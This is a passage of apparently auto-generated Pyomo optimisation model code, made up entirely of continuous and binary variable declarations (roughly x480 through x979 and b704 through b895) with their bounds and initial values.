= Var(within=Reals,bounds=(0,None),initialize=0) m.x481 = Var(within=Reals,bounds=(0,None),initialize=0) m.x482 = Var(within=Reals,bounds=(0,None),initialize=0) m.x483 = Var(within=Reals,bounds=(0,None),initialize=0) m.x484 = Var(within=Reals,bounds=(0,None),initialize=0) m.x485 = Var(within=Reals,bounds=(0,None),initialize=0) m.x486 = Var(within=Reals,bounds=(0,None),initialize=0) m.x487 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x488 = Var(within=Reals,bounds=(0,None),initialize=0) m.x489 = Var(within=Reals,bounds=(0,None),initialize=0) m.x490 = Var(within=Reals,bounds=(0,None),initialize=0) m.x491 = Var(within=Reals,bounds=(0,None),initialize=0) m.x492 = Var(within=Reals,bounds=(0,None),initialize=0) m.x493 = Var(within=Reals,bounds=(0,None),initialize=0) m.x494 = Var(within=Reals,bounds=(0,None),initialize=0) m.x495 = Var(within=Reals,bounds=(0,None),initialize=0) m.x496 = Var(within=Reals,bounds=(0,None),initialize=0) m.x497 = Var(within=Reals,bounds=(0,None),initialize=0) m.x498 = Var(within=Reals,bounds=(0,None),initialize=0) m.x499 = Var(within=Reals,bounds=(0,None),initialize=0) m.x500 = Var(within=Reals,bounds=(0,None),initialize=0) m.x501 = Var(within=Reals,bounds=(0,None),initialize=0) m.x502 = Var(within=Reals,bounds=(0,None),initialize=0) m.x503 = Var(within=Reals,bounds=(0,None),initialize=0) m.x504 = Var(within=Reals,bounds=(0,None),initialize=0) m.x505 = Var(within=Reals,bounds=(0,None),initialize=0) m.x506 = Var(within=Reals,bounds=(0,None),initialize=0) m.x507 = Var(within=Reals,bounds=(0,None),initialize=0) m.x508 = Var(within=Reals,bounds=(0,None),initialize=0) m.x509 = Var(within=Reals,bounds=(0,None),initialize=0) m.x510 = Var(within=Reals,bounds=(0,None),initialize=0) m.x511 = Var(within=Reals,bounds=(0,None),initialize=0) m.x512 = Var(within=Reals,bounds=(0,None),initialize=0) m.x513 = Var(within=Reals,bounds=(0,None),initialize=0) m.x514 = Var(within=Reals,bounds=(0,None),initialize=0) m.x515 = Var(within=Reals,bounds=(0,None),initialize=0) m.x516 = Var(within=Reals,bounds=(0,None),initialize=0) m.x517 = Var(within=Reals,bounds=(0,None),initialize=0) m.x518 = Var(within=Reals,bounds=(0,None),initialize=0) m.x519 = Var(within=Reals,bounds=(0,None),initialize=0) m.x520 = Var(within=Reals,bounds=(0,None),initialize=0) m.x521 = Var(within=Reals,bounds=(0,None),initialize=0) m.x522 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x523 = Var(within=Reals,bounds=(0,None),initialize=0) m.x524 = Var(within=Reals,bounds=(0,None),initialize=0) m.x525 = Var(within=Reals,bounds=(0,None),initialize=0) m.x526 = Var(within=Reals,bounds=(0,None),initialize=0) m.x527 = Var(within=Reals,bounds=(0,None),initialize=0) m.x528 = Var(within=Reals,bounds=(0,None),initialize=0) m.x529 = Var(within=Reals,bounds=(0,None),initialize=0) m.x530 = Var(within=Reals,bounds=(0,None),initialize=0) m.x531 = Var(within=Reals,bounds=(0,None),initialize=0) m.x532 = Var(within=Reals,bounds=(0,None),initialize=0) m.x533 = Var(within=Reals,bounds=(0,None),initialize=0) m.x534 = Var(within=Reals,bounds=(0,None),initialize=0) m.x535 = Var(within=Reals,bounds=(0,None),initialize=0) m.x536 = Var(within=Reals,bounds=(0,None),initialize=0) m.x537 = Var(within=Reals,bounds=(0,None),initialize=0) m.x538 = Var(within=Reals,bounds=(0,None),initialize=0) m.x539 = Var(within=Reals,bounds=(0,None),initialize=0) m.x540 = Var(within=Reals,bounds=(0,None),initialize=0) m.x541 = Var(within=Reals,bounds=(0,None),initialize=0) m.x542 = Var(within=Reals,bounds=(0,None),initialize=0) m.x543 = Var(within=Reals,bounds=(0,None),initialize=0) m.x544 = Var(within=Reals,bounds=(0,None),initialize=0) m.x545 = Var(within=Reals,bounds=(0,None),initialize=0) m.x546 = Var(within=Reals,bounds=(0,None),initialize=0) m.x547 = Var(within=Reals,bounds=(0,None),initialize=0) m.x548 = Var(within=Reals,bounds=(0,None),initialize=0) m.x549 = Var(within=Reals,bounds=(0,None),initialize=0) m.x550 = Var(within=Reals,bounds=(0,None),initialize=0) m.x551 = Var(within=Reals,bounds=(0,None),initialize=0) m.x552 = Var(within=Reals,bounds=(0,None),initialize=0) m.x553 = Var(within=Reals,bounds=(0,None),initialize=0) m.x554 = Var(within=Reals,bounds=(0,None),initialize=0) m.x555 = Var(within=Reals,bounds=(0,None),initialize=0) m.x556 = Var(within=Reals,bounds=(0,None),initialize=0) m.x557 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x558 = Var(within=Reals,bounds=(0,None),initialize=0) m.x559 = Var(within=Reals,bounds=(0,None),initialize=0) m.x560 = Var(within=Reals,bounds=(0,None),initialize=0) m.x561 = Var(within=Reals,bounds=(0,None),initialize=0) m.x562 = Var(within=Reals,bounds=(0,None),initialize=0) m.x563 = Var(within=Reals,bounds=(0,None),initialize=0) m.x564 = Var(within=Reals,bounds=(0,None),initialize=0) m.x565 = Var(within=Reals,bounds=(0,None),initialize=0) m.x566 = Var(within=Reals,bounds=(0,None),initialize=0) m.x567 = Var(within=Reals,bounds=(0,None),initialize=0) m.x568 = Var(within=Reals,bounds=(0,None),initialize=0) m.x569 = Var(within=Reals,bounds=(0,None),initialize=0) m.x570 = Var(within=Reals,bounds=(0,None),initialize=0) m.x571 = Var(within=Reals,bounds=(0,None),initialize=0) m.x572 = Var(within=Reals,bounds=(0,None),initialize=0) m.x573 = Var(within=Reals,bounds=(0,None),initialize=0) m.x574 = Var(within=Reals,bounds=(0,None),initialize=0) m.x575 = Var(within=Reals,bounds=(0,None),initialize=0) m.x576 = Var(within=Reals,bounds=(0,None),initialize=0) m.x577 = Var(within=Reals,bounds=(0,None),initialize=0) m.x578 = Var(within=Reals,bounds=(0,None),initialize=0) m.x579 = Var(within=Reals,bounds=(0,None),initialize=0) m.x580 = Var(within=Reals,bounds=(0,None),initialize=0) m.x581 = Var(within=Reals,bounds=(0,None),initialize=0) m.x582 = Var(within=Reals,bounds=(0,None),initialize=0) m.x583 = Var(within=Reals,bounds=(0,None),initialize=0) m.x584 = Var(within=Reals,bounds=(0,None),initialize=0) m.x585 = Var(within=Reals,bounds=(0,None),initialize=0) m.x586 = Var(within=Reals,bounds=(0,None),initialize=0) m.x587 = Var(within=Reals,bounds=(0,None),initialize=0) m.x588 = Var(within=Reals,bounds=(0,None),initialize=0) m.x589 = Var(within=Reals,bounds=(0,None),initialize=0) m.x590 = Var(within=Reals,bounds=(0,None),initialize=0) m.x591 = Var(within=Reals,bounds=(0,None),initialize=0) m.x592 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x593 = Var(within=Reals,bounds=(0,None),initialize=0) m.x594 = Var(within=Reals,bounds=(0,None),initialize=0) m.x595 = Var(within=Reals,bounds=(0,None),initialize=0) m.x596 = Var(within=Reals,bounds=(0,None),initialize=0) m.x597 = Var(within=Reals,bounds=(0,None),initialize=0) m.x598 = Var(within=Reals,bounds=(0,None),initialize=0) m.x599 = Var(within=Reals,bounds=(0,None),initialize=0) m.x600 = Var(within=Reals,bounds=(0,None),initialize=0) m.x601 = Var(within=Reals,bounds=(0,None),initialize=0) m.x602 = Var(within=Reals,bounds=(0,None),initialize=0) m.x603 = Var(within=Reals,bounds=(0,None),initialize=0) m.x604 = Var(within=Reals,bounds=(0,None),initialize=0) m.x605 = Var(within=Reals,bounds=(0,None),initialize=0) m.x606 = Var(within=Reals,bounds=(0,None),initialize=0) m.x607 = Var(within=Reals,bounds=(0,None),initialize=0) m.x608 = Var(within=Reals,bounds=(0,None),initialize=0) m.x609 = Var(within=Reals,bounds=(0,None),initialize=0) m.x610 = Var(within=Reals,bounds=(0,None),initialize=0) m.x611 = Var(within=Reals,bounds=(0,None),initialize=0) m.x612 = Var(within=Reals,bounds=(0,None),initialize=0) m.x613 = Var(within=Reals,bounds=(0,None),initialize=0) m.x614 = Var(within=Reals,bounds=(0,None),initialize=0) m.x615 = Var(within=Reals,bounds=(0,None),initialize=0) m.x616 = Var(within=Reals,bounds=(0,None),initialize=0) m.x617 = Var(within=Reals,bounds=(0,None),initialize=0) m.x618 = Var(within=Reals,bounds=(0,None),initialize=0) m.x619 = Var(within=Reals,bounds=(0,None),initialize=0) m.x620 = Var(within=Reals,bounds=(0,None),initialize=0) m.x621 = Var(within=Reals,bounds=(0,None),initialize=0) m.x622 = Var(within=Reals,bounds=(0,None),initialize=0) m.x623 = Var(within=Reals,bounds=(0,None),initialize=0) m.x624 = Var(within=Reals,bounds=(0,None),initialize=0) m.x625 = Var(within=Reals,bounds=(0,None),initialize=0) m.x626 = Var(within=Reals,bounds=(0,None),initialize=0) m.x627 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x628 = Var(within=Reals,bounds=(0,None),initialize=0) m.x629 = Var(within=Reals,bounds=(0,None),initialize=0) m.x630 = Var(within=Reals,bounds=(0,None),initialize=0) m.x631 = Var(within=Reals,bounds=(0,None),initialize=0) m.x632 = Var(within=Reals,bounds=(0,None),initialize=0) m.x633 = Var(within=Reals,bounds=(0,None),initialize=0) m.x634 = Var(within=Reals,bounds=(0,None),initialize=0) m.x635 = Var(within=Reals,bounds=(0,None),initialize=0) m.x636 = Var(within=Reals,bounds=(0,None),initialize=0) m.x637 = Var(within=Reals,bounds=(0,None),initialize=0) m.x638 = Var(within=Reals,bounds=(0,None),initialize=0) m.x639 = Var(within=Reals,bounds=(0,None),initialize=0) m.x640 = Var(within=Reals,bounds=(0,None),initialize=0) m.x641 = Var(within=Reals,bounds=(0,None),initialize=0) m.x642 = Var(within=Reals,bounds=(0,None),initialize=0) m.x643 = Var(within=Reals,bounds=(0,None),initialize=0) m.x644 = Var(within=Reals,bounds=(0,None),initialize=0) m.x645 = Var(within=Reals,bounds=(0,None),initialize=0) m.x646 = Var(within=Reals,bounds=(0,None),initialize=0) m.x647 = Var(within=Reals,bounds=(0,None),initialize=0) m.x648 = Var(within=Reals,bounds=(0,None),initialize=0) m.x649 = Var(within=Reals,bounds=(0,None),initialize=0) m.x650 = Var(within=Reals,bounds=(0,None),initialize=0) m.x651 = Var(within=Reals,bounds=(0,None),initialize=0) m.x652 = Var(within=Reals,bounds=(0,None),initialize=0) m.x653 = Var(within=Reals,bounds=(0,None),initialize=0) m.x654 = Var(within=Reals,bounds=(0,None),initialize=0) m.x655 = Var(within=Reals,bounds=(0,None),initialize=0) m.x656 = Var(within=Reals,bounds=(0,None),initialize=0) m.x657 = Var(within=Reals,bounds=(0,None),initialize=0) m.x658 = Var(within=Reals,bounds=(0,None),initialize=0) m.x659 = Var(within=Reals,bounds=(0,None),initialize=0) m.x660 = Var(within=Reals,bounds=(0,None),initialize=0) m.x661 = Var(within=Reals,bounds=(0,None),initialize=0) m.x662 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x663 = Var(within=Reals,bounds=(0,None),initialize=0) m.x664 = Var(within=Reals,bounds=(0,None),initialize=0) m.x665 = Var(within=Reals,bounds=(0,None),initialize=0) m.x666 = Var(within=Reals,bounds=(0,None),initialize=0) m.x667 = Var(within=Reals,bounds=(0,None),initialize=0) m.x668 = Var(within=Reals,bounds=(0,None),initialize=0) m.x669 = Var(within=Reals,bounds=(0,None),initialize=0) m.x670 = Var(within=Reals,bounds=(0,None),initialize=0) m.x671 = Var(within=Reals,bounds=(0,None),initialize=0) m.x672 = Var(within=Reals,bounds=(0,None),initialize=0) m.x673 = Var(within=Reals,bounds=(0,None),initialize=0) m.x674 = Var(within=Reals,bounds=(0,None),initialize=0) m.x675 = Var(within=Reals,bounds=(0,None),initialize=0) m.x676 = Var(within=Reals,bounds=(0,None),initialize=0) m.x677 = Var(within=Reals,bounds=(0,None),initialize=0) m.x678 = Var(within=Reals,bounds=(0,None),initialize=0) m.x679 = Var(within=Reals,bounds=(0,None),initialize=0) m.x680 = Var(within=Reals,bounds=(0,None),initialize=0) m.x681 = Var(within=Reals,bounds=(0,None),initialize=0) m.x682 = Var(within=Reals,bounds=(0,None),initialize=0) m.x683 = Var(within=Reals,bounds=(0,None),initialize=0) m.x684 = Var(within=Reals,bounds=(0,None),initialize=0) m.x685 = Var(within=Reals,bounds=(0,None),initialize=0) m.x686 = Var(within=Reals,bounds=(0,None),initialize=0) m.x687 = Var(within=Reals,bounds=(0,None),initialize=0) m.x688 = Var(within=Reals,bounds=(0,None),initialize=0) m.x689 = Var(within=Reals,bounds=(0,None),initialize=0) m.x690 = Var(within=Reals,bounds=(0,None),initialize=0) m.x691 = Var(within=Reals,bounds=(0,None),initialize=0) m.x692 = Var(within=Reals,bounds=(0,None),initialize=0) m.x693 = Var(within=Reals,bounds=(0,None),initialize=0) m.x694 = Var(within=Reals,bounds=(0,None),initialize=0) m.x695 = Var(within=Reals,bounds=(0,None),initialize=0) m.x696 = Var(within=Reals,bounds=(0,None),initialize=0) m.x697 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x698 = Var(within=Reals,bounds=(0,None),initialize=0) m.x699 = Var(within=Reals,bounds=(0,None),initialize=0) m.x700 = Var(within=Reals,bounds=(0,None),initialize=0) m.x701 = Var(within=Reals,bounds=(0,None),initialize=0) m.x702 = Var(within=Reals,bounds=(0,None),initialize=0) m.x703 = Var(within=Reals,bounds=(0,None),initialize=0) m.b704 = Var(within=Binary,bounds=(0,1),initialize=0) m.b705 = Var(within=Binary,bounds=(0,1),initialize=0) m.b706 = Var(within=Binary,bounds=(0,1),initialize=0) m.b707 = Var(within=Binary,bounds=(0,1),initialize=0) m.b708 = Var(within=Binary,bounds=(0,1),initialize=0) m.b709 = Var(within=Binary,bounds=(0,1),initialize=0) m.b710 = Var(within=Binary,bounds=(0,1),initialize=0) m.b711 = Var(within=Binary,bounds=(0,1),initialize=0) m.b712 = Var(within=Binary,bounds=(0,1),initialize=0) m.b713 = Var(within=Binary,bounds=(0,1),initialize=0) m.b714 = Var(within=Binary,bounds=(0,1),initialize=0) m.b715 = Var(within=Binary,bounds=(0,1),initialize=0) m.b716 = Var(within=Binary,bounds=(0,1),initialize=0) m.b717 = Var(within=Binary,bounds=(0,1),initialize=0) m.b718 = Var(within=Binary,bounds=(0,1),initialize=0) m.b719 = Var(within=Binary,bounds=(0,1),initialize=0) m.b720 = Var(within=Binary,bounds=(0,1),initialize=0) m.b721 = Var(within=Binary,bounds=(0,1),initialize=0) m.b722 = Var(within=Binary,bounds=(0,1),initialize=0) m.b723 = Var(within=Binary,bounds=(0,1),initialize=0) m.b724 = Var(within=Binary,bounds=(0,1),initialize=0) m.b725 = Var(within=Binary,bounds=(0,1),initialize=0) m.b726 = Var(within=Binary,bounds=(0,1),initialize=0) m.b727 = Var(within=Binary,bounds=(0,1),initialize=0) m.b728 = Var(within=Binary,bounds=(0,1),initialize=0) m.b729 = Var(within=Binary,bounds=(0,1),initialize=0) m.b730 = Var(within=Binary,bounds=(0,1),initialize=0) m.b731 = Var(within=Binary,bounds=(0,1),initialize=0) m.b732 = Var(within=Binary,bounds=(0,1),initialize=0) m.b733 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b734 = Var(within=Binary,bounds=(0,1),initialize=0) m.b735 = Var(within=Binary,bounds=(0,1),initialize=0) m.b736 = Var(within=Binary,bounds=(0,1),initialize=0) m.b737 = Var(within=Binary,bounds=(0,1),initialize=0) m.b738 = Var(within=Binary,bounds=(0,1),initialize=0) m.b739 = Var(within=Binary,bounds=(0,1),initialize=0) m.b740 = Var(within=Binary,bounds=(0,1),initialize=0) m.b741 = Var(within=Binary,bounds=(0,1),initialize=0) m.b742 = Var(within=Binary,bounds=(0,1),initialize=0) m.b743 = Var(within=Binary,bounds=(0,1),initialize=0) m.b744 = Var(within=Binary,bounds=(0,1),initialize=0) m.b745 = Var(within=Binary,bounds=(0,1),initialize=0) m.b746 = Var(within=Binary,bounds=(0,1),initialize=0) m.b747 = Var(within=Binary,bounds=(0,1),initialize=0) m.b748 = Var(within=Binary,bounds=(0,1),initialize=0) m.b749 = Var(within=Binary,bounds=(0,1),initialize=0) m.b750 = Var(within=Binary,bounds=(0,1),initialize=0) m.b751 = Var(within=Binary,bounds=(0,1),initialize=0) m.b752 = Var(within=Binary,bounds=(0,1),initialize=0) m.b753 = Var(within=Binary,bounds=(0,1),initialize=0) m.b754 = Var(within=Binary,bounds=(0,1),initialize=0) m.b755 = Var(within=Binary,bounds=(0,1),initialize=0) m.b756 = Var(within=Binary,bounds=(0,1),initialize=0) m.b757 = Var(within=Binary,bounds=(0,1),initialize=0) m.b758 = Var(within=Binary,bounds=(0,1),initialize=0) m.b759 = Var(within=Binary,bounds=(0,1),initialize=0) m.b760 = Var(within=Binary,bounds=(0,1),initialize=0) m.b761 = Var(within=Binary,bounds=(0,1),initialize=0) m.b762 = Var(within=Binary,bounds=(0,1),initialize=0) m.b763 = Var(within=Binary,bounds=(0,1),initialize=0) m.b764 = Var(within=Binary,bounds=(0,1),initialize=0) m.b765 = Var(within=Binary,bounds=(0,1),initialize=0) m.b766 = Var(within=Binary,bounds=(0,1),initialize=0) m.b767 = Var(within=Binary,bounds=(0,1),initialize=0) m.b768 = Var(within=Binary,bounds=(0,1),initialize=0) m.b769 = Var(within=Binary,bounds=(0,1),initialize=0) m.b770 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b771 = Var(within=Binary,bounds=(0,1),initialize=0) m.b772 = Var(within=Binary,bounds=(0,1),initialize=0) m.b773 = Var(within=Binary,bounds=(0,1),initialize=0) m.b774 = Var(within=Binary,bounds=(0,1),initialize=0) m.b775 = Var(within=Binary,bounds=(0,1),initialize=0) m.b776 = Var(within=Binary,bounds=(0,1),initialize=0) m.b777 = Var(within=Binary,bounds=(0,1),initialize=0) m.b778 = Var(within=Binary,bounds=(0,1),initialize=0) m.b779 = Var(within=Binary,bounds=(0,1),initialize=0) m.b780 = Var(within=Binary,bounds=(0,1),initialize=0) m.b781 = Var(within=Binary,bounds=(0,1),initialize=0) m.b782 = Var(within=Binary,bounds=(0,1),initialize=0) m.b783 = Var(within=Binary,bounds=(0,1),initialize=0) m.b784 = Var(within=Binary,bounds=(0,1),initialize=0) m.b785 = Var(within=Binary,bounds=(0,1),initialize=0) m.b786 = Var(within=Binary,bounds=(0,1),initialize=0) m.b787 = Var(within=Binary,bounds=(0,1),initialize=0) m.b788 = Var(within=Binary,bounds=(0,1),initialize=0) m.b789 = Var(within=Binary,bounds=(0,1),initialize=0) m.b790 = Var(within=Binary,bounds=(0,1),initialize=0) m.b791 = Var(within=Binary,bounds=(0,1),initialize=0) m.b792 = Var(within=Binary,bounds=(0,1),initialize=0) m.b793 = Var(within=Binary,bounds=(0,1),initialize=0) m.b794 = Var(within=Binary,bounds=(0,1),initialize=0) m.b795 = Var(within=Binary,bounds=(0,1),initialize=0) m.b796 = Var(within=Binary,bounds=(0,1),initialize=0) m.b797 = Var(within=Binary,bounds=(0,1),initialize=0) m.b798 = Var(within=Binary,bounds=(0,1),initialize=0) m.b799 = Var(within=Binary,bounds=(0,1),initialize=0) m.b800 = Var(within=Binary,bounds=(0,1),initialize=0) m.b801 = Var(within=Binary,bounds=(0,1),initialize=0) m.b802 = Var(within=Binary,bounds=(0,1),initialize=0) m.b803 = Var(within=Binary,bounds=(0,1),initialize=0) m.b804 = Var(within=Binary,bounds=(0,1),initialize=0) m.b805 = Var(within=Binary,bounds=(0,1),initialize=0) m.b806 = Var(within=Binary,bounds=(0,1),initialize=0) m.b807 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b808 = Var(within=Binary,bounds=(0,1),initialize=0) m.b809 = Var(within=Binary,bounds=(0,1),initialize=0) m.b810 = Var(within=Binary,bounds=(0,1),initialize=0) m.b811 = Var(within=Binary,bounds=(0,1),initialize=0) m.b812 = Var(within=Binary,bounds=(0,1),initialize=0) m.b813 = Var(within=Binary,bounds=(0,1),initialize=0) m.b814 = Var(within=Binary,bounds=(0,1),initialize=0) m.b815 = Var(within=Binary,bounds=(0,1),initialize=0) m.b816 = Var(within=Binary,bounds=(0,1),initialize=0) m.b817 = Var(within=Binary,bounds=(0,1),initialize=0) m.b818 = Var(within=Binary,bounds=(0,1),initialize=0) m.b819 = Var(within=Binary,bounds=(0,1),initialize=0) m.b820 = Var(within=Binary,bounds=(0,1),initialize=0) m.b821 = Var(within=Binary,bounds=(0,1),initialize=0) m.b822 = Var(within=Binary,bounds=(0,1),initialize=0) m.b823 = Var(within=Binary,bounds=(0,1),initialize=0) m.b824 = Var(within=Binary,bounds=(0,1),initialize=0) m.b825 = Var(within=Binary,bounds=(0,1),initialize=0) m.b826 = Var(within=Binary,bounds=(0,1),initialize=0) m.b827 = Var(within=Binary,bounds=(0,1),initialize=0) m.b828 = Var(within=Binary,bounds=(0,1),initialize=0) m.b829 = Var(within=Binary,bounds=(0,1),initialize=0) m.b830 = Var(within=Binary,bounds=(0,1),initialize=0) m.b831 = Var(within=Binary,bounds=(0,1),initialize=0) m.b832 = Var(within=Binary,bounds=(0,1),initialize=0) m.b833 = Var(within=Binary,bounds=(0,1),initialize=0) m.b834 = Var(within=Binary,bounds=(0,1),initialize=0) m.b835 = Var(within=Binary,bounds=(0,1),initialize=0) m.b836 = Var(within=Binary,bounds=(0,1),initialize=0) m.b837 = Var(within=Binary,bounds=(0,1),initialize=0) m.b838 = Var(within=Binary,bounds=(0,1),initialize=0) m.b839 = Var(within=Binary,bounds=(0,1),initialize=0) m.b840 = Var(within=Binary,bounds=(0,1),initialize=0) m.b841 = Var(within=Binary,bounds=(0,1),initialize=0) m.b842 = Var(within=Binary,bounds=(0,1),initialize=0) m.b843 = Var(within=Binary,bounds=(0,1),initialize=0) m.b844 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b845 = Var(within=Binary,bounds=(0,1),initialize=0) m.b846 = Var(within=Binary,bounds=(0,1),initialize=0) m.b847 = Var(within=Binary,bounds=(0,1),initialize=0) m.b848 = Var(within=Binary,bounds=(0,1),initialize=0) m.b849 = Var(within=Binary,bounds=(0,1),initialize=0) m.b850 = Var(within=Binary,bounds=(0,1),initialize=0) m.b851 = Var(within=Binary,bounds=(0,1),initialize=0) m.b852 = Var(within=Binary,bounds=(0,1),initialize=0) m.b853 = Var(within=Binary,bounds=(0,1),initialize=0) m.b854 = Var(within=Binary,bounds=(0,1),initialize=0) m.b855 = Var(within=Binary,bounds=(0,1),initialize=0) m.b856 = Var(within=Binary,bounds=(0,1),initialize=0) m.b857 = Var(within=Binary,bounds=(0,1),initialize=0) m.b858 = Var(within=Binary,bounds=(0,1),initialize=0) m.b859 = Var(within=Binary,bounds=(0,1),initialize=0) m.b860 = Var(within=Binary,bounds=(0,1),initialize=0) m.b861 = Var(within=Binary,bounds=(0,1),initialize=0) m.b862 = Var(within=Binary,bounds=(0,1),initialize=0) m.b863 = Var(within=Binary,bounds=(0,1),initialize=0) m.b864 = Var(within=Binary,bounds=(0,1),initialize=0) m.b865 = Var(within=Binary,bounds=(0,1),initialize=0) m.b866 = Var(within=Binary,bounds=(0,1),initialize=0) m.b867 = Var(within=Binary,bounds=(0,1),initialize=0) m.b868 = Var(within=Binary,bounds=(0,1),initialize=0) m.b869 = Var(within=Binary,bounds=(0,1),initialize=0) m.b870 = Var(within=Binary,bounds=(0,1),initialize=0) m.b871 = Var(within=Binary,bounds=(0,1),initialize=0) m.b872 = Var(within=Binary,bounds=(0,1),initialize=0) m.b873 = Var(within=Binary,bounds=(0,1),initialize=0) m.b874 = Var(within=Binary,bounds=(0,1),initialize=0) m.b875 = Var(within=Binary,bounds=(0,1),initialize=0) m.b876 = Var(within=Binary,bounds=(0,1),initialize=0) m.b877 = Var(within=Binary,bounds=(0,1),initialize=0) m.b878 = Var(within=Binary,bounds=(0,1),initialize=0) m.b879 = Var(within=Binary,bounds=(0,1),initialize=0) m.b880 = Var(within=Binary,bounds=(0,1),initialize=0) m.b881 = 
Var(within=Binary,bounds=(0,1),initialize=0) m.b882 = Var(within=Binary,bounds=(0,1),initialize=0) m.b883 = Var(within=Binary,bounds=(0,1),initialize=0) m.b884 = Var(within=Binary,bounds=(0,1),initialize=0) m.b885 = Var(within=Binary,bounds=(0,1),initialize=0) m.b886 = Var(within=Binary,bounds=(0,1),initialize=0) m.b887 = Var(within=Binary,bounds=(0,1),initialize=0) m.b888 = Var(within=Binary,bounds=(0,1),initialize=0) m.b889 = Var(within=Binary,bounds=(0,1),initialize=0) m.b890 = Var(within=Binary,bounds=(0,1),initialize=0) m.b891 = Var(within=Binary,bounds=(0,1),initialize=0) m.b892 = Var(within=Binary,bounds=(0,1),initialize=0) m.b893 = Var(within=Binary,bounds=(0,1),initialize=0) m.b894 = Var(within=Binary,bounds=(0,1),initialize=0) m.b895 = Var(within=Binary,bounds=(0,1),initialize=0) m.x896 = Var(within=Reals,bounds=(0,40),initialize=0) m.x897 = Var(within=Reals,bounds=(0,40),initialize=0) m.x898 = Var(within=Reals,bounds=(0,40),initialize=0) m.x899 = Var(within=Reals,bounds=(0,None),initialize=0) m.x900 = Var(within=Reals,bounds=(0,None),initialize=0) m.x901 = Var(within=Reals,bounds=(0,None),initialize=0) m.x902 = Var(within=Reals,bounds=(0,None),initialize=0) m.x903 = Var(within=Reals,bounds=(0,None),initialize=0) m.x904 = Var(within=Reals,bounds=(0,None),initialize=0) m.x905 = Var(within=Reals,bounds=(0,None),initialize=0) m.x906 = Var(within=Reals,bounds=(0,None),initialize=0) m.x907 = Var(within=Reals,bounds=(0,None),initialize=0) m.x908 = Var(within=Reals,bounds=(0,None),initialize=0) m.x909 = Var(within=Reals,bounds=(0,None),initialize=0) m.x910 = Var(within=Reals,bounds=(0,None),initialize=0) m.x911 = Var(within=Reals,bounds=(0,None),initialize=0) m.x912 = Var(within=Reals,bounds=(0,None),initialize=0) m.x913 = Var(within=Reals,bounds=(0,None),initialize=0) m.x914 = Var(within=Reals,bounds=(0,None),initialize=0) m.x915 = Var(within=Reals,bounds=(0,None),initialize=0) m.x916 = Var(within=Reals,bounds=(0,None),initialize=0) m.x917 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x918 = Var(within=Reals,bounds=(0,None),initialize=0) m.x919 = Var(within=Reals,bounds=(0,None),initialize=0) m.x920 = Var(within=Reals,bounds=(0,None),initialize=0) m.x921 = Var(within=Reals,bounds=(0,None),initialize=0) m.x922 = Var(within=Reals,bounds=(0,None),initialize=0) m.x923 = Var(within=Reals,bounds=(0,None),initialize=0) m.x924 = Var(within=Reals,bounds=(0,None),initialize=0) m.x925 = Var(within=Reals,bounds=(0,None),initialize=0) m.x926 = Var(within=Reals,bounds=(0,None),initialize=0) m.x927 = Var(within=Reals,bounds=(0,None),initialize=0) m.x928 = Var(within=Reals,bounds=(0,None),initialize=0) m.x929 = Var(within=Reals,bounds=(0,30),initialize=0) m.x930 = Var(within=Reals,bounds=(0,30),initialize=0) m.x931 = Var(within=Reals,bounds=(0,30),initialize=0) m.x932 = Var(within=Reals,bounds=(0,None),initialize=0) m.x933 = Var(within=Reals,bounds=(0,None),initialize=0) m.x934 = Var(within=Reals,bounds=(0,None),initialize=0) m.x935 = Var(within=Reals,bounds=(0,None),initialize=0) m.x936 = Var(within=Reals,bounds=(0,None),initialize=0) m.x937 = Var(within=Reals,bounds=(0,None),initialize=0) m.x938 = Var(within=Reals,bounds=(0,None),initialize=0) m.x939 = Var(within=Reals,bounds=(0,None),initialize=0) m.x940 = Var(within=Reals,bounds=(0,None),initialize=0) m.x941 = Var(within=Reals,bounds=(0,None),initialize=0) m.x942 = Var(within=Reals,bounds=(0,None),initialize=0) m.x943 = Var(within=Reals,bounds=(0,None),initialize=0) m.x944 = Var(within=Reals,bounds=(0,None),initialize=0) m.x945 = Var(within=Reals,bounds=(0,None),initialize=0) m.x946 = Var(within=Reals,bounds=(0,None),initialize=0) m.x947 = Var(within=Reals,bounds=(0,None),initialize=0) m.x948 = Var(within=Reals,bounds=(0,None),initialize=0) m.x949 = Var(within=Reals,bounds=(0,None),initialize=0) m.x950 = Var(within=Reals,bounds=(0,None),initialize=0) m.x951 = Var(within=Reals,bounds=(0,None),initialize=0) m.x952 = 
Var(within=Reals,bounds=(0,None),initialize=0) m.x953 = Var(within=Reals,bounds=(0,None),initialize=0) m.x954 = Var(within=Reals,bounds=(0,None),initialize=0) m.x955 = Var(within=Reals,bounds=(0,None),initialize=0) m.x956 = Var(within=Reals,bounds=(0,None),initialize=0) m.x957 = Var(within=Reals,bounds=(0,None),initialize=0) m.x958 = Var(within=Reals,bounds=(0,None),initialize=0) m.x959 = Var(within=Reals,bounds=(0,None),initialize=0) m.x960 = Var(within=Reals,bounds=(0,None),initialize=0) m.x961 = Var(within=Reals,bounds=(0,None),initialize=0) m.x962 = Var(within=Reals,bounds=(0,None),initialize=0) m.x963 = Var(within=Reals,bounds=(0,None),initialize=0) m.x964 = Var(within=Reals,bounds=(0,None),initialize=0) m.x965 = Var(within=Reals,bounds=(0,None),initialize=0) m.x966 = Var(within=Reals,bounds=(0,None),initialize=0) m.x967 = Var(within=Reals,bounds=(0,None),initialize=0) m.x968 = Var(within=Reals,bounds=(0,None),initialize=0) m.x969 = Var(within=Reals,bounds=(0,None),initialize=0) m.x970 = Var(within=Reals,bounds=(0,None),initialize=0) m.x971 = Var(within=Reals,bounds=(0,None),initialize=0) m.x972 = Var(within=Reals,bounds=(0,None),initialize=0) m.x973 = Var(within=Reals,bounds=(0,None),initialize=0) m.x974 = Var(within=Reals,bounds=(0,None),initialize=0) m.x975 = Var(within=Reals,bounds=(0,None),initialize=0) m.x976 = Var(within=Reals,bounds=(0,None),initialize=0) m.x977 = Var(within=Reals,bounds=(0,None),initialize=0) m.x978 = Var(within=Reals,bounds=(0,None),initialize=0) m.x979 = 